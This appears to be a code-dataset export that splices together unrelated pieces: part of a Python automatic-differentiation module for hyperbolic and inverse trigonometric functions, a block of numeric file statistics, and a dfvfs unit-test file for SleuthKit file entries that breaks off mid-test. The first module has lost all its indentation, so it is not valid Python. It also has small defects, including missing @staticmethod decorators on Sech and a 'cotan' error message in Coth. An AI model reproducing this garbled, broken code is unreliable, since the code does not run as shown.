RETURNS
========
derivative of var with respect to sub_expr1
"""
return np.sinh(sub_expr1.val)
def cosh(expr):
return Expression(Cosh, expr)
class Tanh:
"""
This is a class to wrap up static method related to tanh operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute tanh of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
tanh sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return np.sinh(x)/np.cosh(x)
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
tanh = np.sinh(x)/np.cosh(x)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * (1-tanh*tanh)
else: raise NotImplementedError('higher order derivatives not implemented for tanh.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
tanh = np.sinh(x)/np.cosh(x)
return 1-tanh*tanh
def tanh(expr):
return Expression(Tanh,expr)
class Csch:
"""
This is a class to wrap up static method related to csch operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute csch of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
csch sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return 1/np.sinh(x)
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
# d = -csch(x)*cot(x)
d = -(1/np.sinh(x)) * (np.cosh(x)/np.sinh(x))
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * d
else: raise NotImplementedError('higher order derivatives not implemented for csch.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return -(np.cosh(x)/np.sinh(x))*(1/np.sinh(x))
def csch(expr):
return Expression(Csch, expr)
class Sech:
"""
This is a class to wrap up static method related to sech operation
"""
def evaluation_at(sub_expr1,val_dict):
"""
Compute sech of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
sech sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return 1/np.cosh(x)
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
# d = -sech(x)tanh(x)
d = -(1/np.cosh(x)) * (np.sinh(x)/np.cosh(x))
if order == 1:
return sub_expr1.derivative_at(var, val_dict)*d
else: raise NotImplementedError('higher order derivatives not implemented for sech.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return -(1/np.cosh(x)) * (np.sinh(x)/np.cosh(x))
def sech(expr):
return Expression(Sech, expr)
class Coth:
"""
This is a class to wrap up static method related to coth operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute coth of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
coth sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return np.cosh(x)/np.sinh(x)
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
coth = np.cosh(x)/np.sinh(x)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * (1-coth**2)
else: raise NotImplementedError('higher order derivatives not implemented for cotan.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
coth = np.cosh(x)/np.sinh(x)
return 1-coth**2
def coth(expr):
return Expression(Coth, expr)
class Arcsin:
"""
This is a class to wrap up static method related to arcsin operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute arcsin of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
arcsin sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return np.arcsin(x)
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
d = 1/np.sqrt(1-x**2)
#1/sqrt(1-x^2)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * d
else: raise NotImplementedError('higher order derivatives not implemented for arcsin.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return 1/np.sqrt(1-x**2)
def arcsin(expr):
return Expression(Arcsin, expr)
class Arccos:
"""
This is a class to wrap up static method related to arccos operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute arccos of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
arccos sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return np.arccos(x)
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
d = 1/np.sqrt(1-x**2)
#-1/sqrt(1-x^2)
if order == 1:
return -sub_expr1.derivative_at(var, val_dict) * d
else: raise NotImplementedError('higher order derivatives not implemented for arccos.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return -1/np.sqrt(1-x**2)
def arccos(expr):
return Expression(Arccos, expr)
class Arctan:
"""
This is a class to wrap up static method related to arctan operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute arctan of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
arctan sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
return np.arctan(x)
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
d = 1/(1+x**2)
# d = 1/(1+x**2)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * d
else: raise NotImplementedError('higher order derivatives not implemented for arctan.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return 1/(1+x**2)
def arctan(expr):
return Expression(Arctan, expr)
def logit(expr):
return log(expr/(1-expr))
def sigmoid(expr):
return 1/(1+exp(-expr))
| 32.000537
| 105
| 0.578241
| 7,096
| 59,617
| 4.697858
| 0.032694
| 0.083753
| 0.027298
| 0.036477
| 0.887059
| 0.858651
| 0.835553
| 0.812185
| 0.785037
| 0.770278
| 0
| 0.021621
| 0.337454
| 59,617
| 1,863
| 106
| 32.000537
| 0.82235
| 0.398091
| 0
| 0.546042
| 0
| 0
| 0.037026
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.203554
| false
| 0
| 0.001616
| 0.037157
| 0.502423
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4a96de0ece39e2a0320359bc68df8ef91b9ecec
| 38,504
|
py
|
Python
|
tests/vfs/tsk_file_entry.py
|
dfrc-korea/dfvfs
|
7be70af72f56f4feadd50206e33b0f5024907473
|
[
"Apache-2.0"
] | 1
|
2021-02-15T03:41:46.000Z
|
2021-02-15T03:41:46.000Z
|
tests/vfs/tsk_file_entry.py
|
dfrc-korea/dfvfs
|
7be70af72f56f4feadd50206e33b0f5024907473
|
[
"Apache-2.0"
] | null | null | null |
tests/vfs/tsk_file_entry.py
|
dfrc-korea/dfvfs
|
7be70af72f56f4feadd50206e33b0f5024907473
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the file entry implementation using the SleuthKit (TSK)."""
import unittest
import pytsk3
from dfvfs.path import os_path_spec
from dfvfs.path import qcow_path_spec
from dfvfs.path import tsk_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import tsk_file_entry
from dfvfs.vfs import tsk_file_system
from tests import test_lib as shared_test_lib
class TSKTimeTest(unittest.TestCase):
"""Tests for the SleuthKit timestamp."""
def testCopyFromDateTimeString(self):
"""Tests the CopyFromDateTimeString function."""
tsk_time_object = tsk_file_entry.TSKTime()
if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
expected_fraction_of_second = 546875000
else:
expected_fraction_of_second = 5468750
tsk_time_object.CopyFromDateTimeString('2010-08-12 21:06:31.546875')
self.assertEqual(tsk_time_object.timestamp, 1281647191)
self.assertEqual(
tsk_time_object.fraction_of_second, expected_fraction_of_second)
def testCopyToStatTimeTuple(self):
"""Tests the CopyToStatTimeTuple function."""
if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
fraction_of_second = 546875000
else:
fraction_of_second = 5468750
tsk_time_object = tsk_file_entry.TSKTime(
fraction_of_second=fraction_of_second, timestamp=1281643591)
stat_time_tuple = tsk_time_object.CopyToStatTimeTuple()
self.assertEqual(stat_time_tuple, (1281643591, 5468750))
tsk_time_object = tsk_file_entry.TSKTime()
stat_time_tuple = tsk_time_object.CopyToStatTimeTuple()
self.assertEqual(stat_time_tuple, (None, None))
def testCopyToDateTimeString(self):
"""Tests the CopyToDateTimeString function."""
if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
fraction_of_second = 546875000
else:
fraction_of_second = 5468750
tsk_time_object = tsk_file_entry.TSKTime(
fraction_of_second=fraction_of_second, timestamp=1281643591)
if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
expected_date_time_string = '2010-08-12 20:06:31.546875000'
else:
expected_date_time_string = '2010-08-12 20:06:31.5468750'
date_time_string = tsk_time_object.CopyToDateTimeString()
self.assertEqual(date_time_string, expected_date_time_string)
tsk_time_object = tsk_file_entry.TSKTime()
date_time_string = tsk_time_object.CopyToDateTimeString()
self.assertIsNone(date_time_string)
def testGetDate(self):
"""Tests the GetDate function."""
if pytsk3.TSK_VERSION_NUM >= 0x040200ff:
fraction_of_second = 546875000
else:
fraction_of_second = 5468750
tsk_time_object = tsk_file_entry.TSKTime(
fraction_of_second=fraction_of_second, timestamp=1281643591)
date_tuple = tsk_time_object.GetDate()
self.assertEqual(date_tuple, (2010, 8, 12))
tsk_time_object = tsk_file_entry.TSKTime()
date_tuple = tsk_time_object.GetDate()
self.assertEqual(date_tuple, (None, None, None))
def testGetPlasoTimestamp(self):
"""Tests the GetPlasoTimestamp function."""
tsk_time_object = tsk_file_entry.TSKTime(
fraction_of_second=546875000, timestamp=1281643591)
micro_posix_timestamp = tsk_time_object.GetPlasoTimestamp()
self.assertEqual(micro_posix_timestamp, 1281643591546875)
tsk_time_object = tsk_file_entry.TSKTime()
micro_posix_timestamp = tsk_time_object.GetPlasoTimestamp()
self.assertIsNone(micro_posix_timestamp)
# TODO: add tests for TSKAttribute
# TODO: add tests for TSKDataStream
class TSKDirectoryTest(shared_test_lib.BaseTestCase):
"""Tests the TSK directory."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = self._GetTestFilePath(['ext2.raw'])
self._SkipIfPathNotExists(test_file)
self._os_path_spec = os_path_spec.OSPathSpec(location=test_file)
self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
self._file_system.Open(self._tsk_path_spec)
def tearDown(self):
"""Cleans up the needed objects used throughout the test."""
self._file_system.Close()
self._resolver_context.Empty()
def testInitialize(self):
"""Tests the __init__ function."""
directory = tsk_file_entry.TSKDirectory(
self._file_system, self._tsk_path_spec)
self.assertIsNotNone(directory)
def testEntriesGenerator(self):
"""Tests the _EntriesGenerator function."""
directory = tsk_file_entry.TSKDirectory(
self._file_system, self._tsk_path_spec)
self.assertIsNotNone(directory)
entries = list(directory.entries)
self.assertEqual(len(entries), 5)
class TSKFileEntryTestExt2(shared_test_lib.BaseTestCase):
"""Tests the SleuthKit (TSK) file entry on ext2."""
_INODE_A_DIRECTORY = 12
_INODE_A_LINK = 16
_INODE_ANOTHER_FILE = 15
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = self._GetTestFilePath(['ext2.raw'])
self._SkipIfPathNotExists(test_file)
self._os_path_spec = os_path_spec.OSPathSpec(location=test_file)
self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
self._file_system.Open(self._tsk_path_spec)
def tearDown(self):
"""Cleans up the needed objects used throughout the test."""
self._file_system.Close()
self._resolver_context.Empty()
def testInitialize(self):
"""Tests the __init__ function."""
file_entry = tsk_file_entry.TSKFileEntry(
self._resolver_context, self._file_system, self._tsk_path_spec)
self.assertIsNotNone(file_entry)
# TODO: add tests for _GetAttributes
# TODO: add tests for _GetDataStreams
# TODO: add tests for _GetDirectory
# TODO: add tests for _GetLink
# TODO: add tests for _GetStat
# TODO: add tests for _GetSubFileEntries
# TODO: add tests for _GetTimeValue
# TODO: add tests for _TSKFileTimeCopyToStatTimeTuple
def testAccessTime(self):
"""Test the access_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.access_time)
def testBackupTime(self):
"""Test the backup_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.backup_time)
def testChangeTime(self):
"""Test the change_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.change_time)
def testCreationTime(self):
"""Test the creation_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.creation_time)
def testDeletionTime(self):
"""Test the deletion_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.deletion_time)
def testModificationTime(self):
"""Test the modification_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.modification_time)
def testName(self):
"""Test the name property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.name, 'another_file')
def testSize(self):
"""Test the size property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.size, 22)
def testGetFileEntryByPathSpec(self):
"""Tests the GetFileEntryByPathSpec function."""
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
# TODO: add tests for GetFileObject
def testGetLinkedFileEntry(self):
"""Tests the GetLinkedFileEntry function."""
test_location = '/a_link'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_LINK, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
linked_file_entry = file_entry.GetLinkedFileEntry()
self.assertIsNotNone(linked_file_entry)
self.assertEqual(linked_file_entry.name, 'another_file')
def testGetParentFileEntry(self):
"""Tests the GetParentFileEntry function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
parent_file_entry = file_entry.GetParentFileEntry()
self.assertIsNotNone(parent_file_entry)
self.assertEqual(parent_file_entry.name, 'a_directory')
def testGetStat(self):
"""Tests the GetStat function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
stat_object = file_entry.GetStat()
self.assertIsNotNone(stat_object)
self.assertEqual(stat_object.type, stat_object.TYPE_FILE)
self.assertEqual(stat_object.size, 22)
self.assertEqual(stat_object.mode, 436)
self.assertEqual(stat_object.uid, 1000)
self.assertEqual(stat_object.gid, 1000)
self.assertEqual(stat_object.atime, 1567246979)
self.assertFalse(hasattr(stat_object, 'atime_nano'))
self.assertEqual(stat_object.ctime, 1567246979)
self.assertFalse(hasattr(stat_object, 'ctime_nano'))
# EXT2 has no crtime timestamp.
self.assertFalse(hasattr(stat_object, 'crtime'))
self.assertFalse(hasattr(stat_object, 'crtime_nano'))
self.assertEqual(stat_object.mtime, 1567246979)
self.assertFalse(hasattr(stat_object, 'mtime_nano'))
# TODO: add tests for GetTSKFile
def testIsFunctions(self):
"""Tests the Is? functions."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertFalse(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertFalse(file_entry.IsDirectory())
self.assertTrue(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
test_location = '/a_directory'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertFalse(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertTrue(file_entry.IsDirectory())
self.assertFalse(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertTrue(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertTrue(file_entry.IsDirectory())
self.assertFalse(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
def testSubFileEntries(self):
"""Tests the number_of_sub_file_entries and sub_file_entries properties."""
path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_sub_file_entries, 5)
# Note that passwords.txt~ is currently ignored by dfvfs, since
# its directory entry has no pytsk3.TSK_FS_META object.
expected_sub_file_entry_names = [
'a_directory',
'a_link',
'lost+found',
'passwords.txt',
'$OrphanFiles']
sub_file_entry_names = []
for sub_file_entry in file_entry.sub_file_entries:
sub_file_entry_names.append(sub_file_entry.name)
self.assertEqual(
len(sub_file_entry_names), len(expected_sub_file_entry_names))
self.assertEqual(
sorted(sub_file_entry_names), sorted(expected_sub_file_entry_names))
# Test a path specification without a location.
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_sub_file_entries, 2)
def testDataStreams(self):
"""Tests the data streams functionality."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 1)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [''])
test_location = '/a_directory'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 0)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [])
def testGetDataStream(self):
"""Tests the GetDataStream function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
data_stream_name = ''
data_stream = file_entry.GetDataStream(data_stream_name)
self.assertIsNotNone(data_stream)
class TSKFileEntryTestHFSPlus(shared_test_lib.BaseTestCase):
"""Tests the SleuthKit (TSK) file entry on HFS+."""
_INODE_A_DIRECTORY = 18
_INODE_A_LINK = 22
_INODE_ANOTHER_FILE = 21
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = self._GetTestFilePath(['hfsplus.raw'])
self._SkipIfPathNotExists(test_file)
self._os_path_spec = os_path_spec.OSPathSpec(location=test_file)
self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
self._file_system.Open(self._tsk_path_spec)
def tearDown(self):
"""Cleans up the needed objects used throughout the test."""
self._file_system.Close()
self._resolver_context.Empty()
def testInitialize(self):
"""Tests the __init__ function."""
file_entry = tsk_file_entry.TSKFileEntry(
self._resolver_context, self._file_system, self._tsk_path_spec)
self.assertIsNotNone(file_entry)
# TODO: add tests for _GetAttributes
# TODO: add tests for _GetDataStreams
# TODO: add tests for _GetDirectory
# TODO: add tests for _GetLink
# TODO: add tests for _GetStat
# TODO: add tests for _GetSubFileEntries
# TODO: add tests for _GetTimeValue
# TODO: add tests for _TSKFileTimeCopyToStatTimeTuple
def testAccessTime(self):
"""Test the access_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.access_time)
def testBackupTime(self):
"""Test the backup_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.backup_time)
def testChangeTime(self):
"""Test the change_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.change_time)
def testCreationTime(self):
"""Test the creation_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.creation_time)
def testDeletionTime(self):
"""Test the deletion_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.deletion_time)
def testModificationTime(self):
"""Test the modification_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.modification_time)
def testName(self):
"""Test the name property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.name, 'another_file')
def testSize(self):
"""Test the size property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.size, 22)
# TODO: add tests for GetFileObject
def testGetFileEntryByPathSpec(self):
"""Tests the GetFileEntryByPathSpec function."""
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
def testGetLinkedFileEntry(self):
"""Tests the GetLinkedFileEntry function."""
test_location = '/a_link'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_LINK, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
linked_file_entry = file_entry.GetLinkedFileEntry()
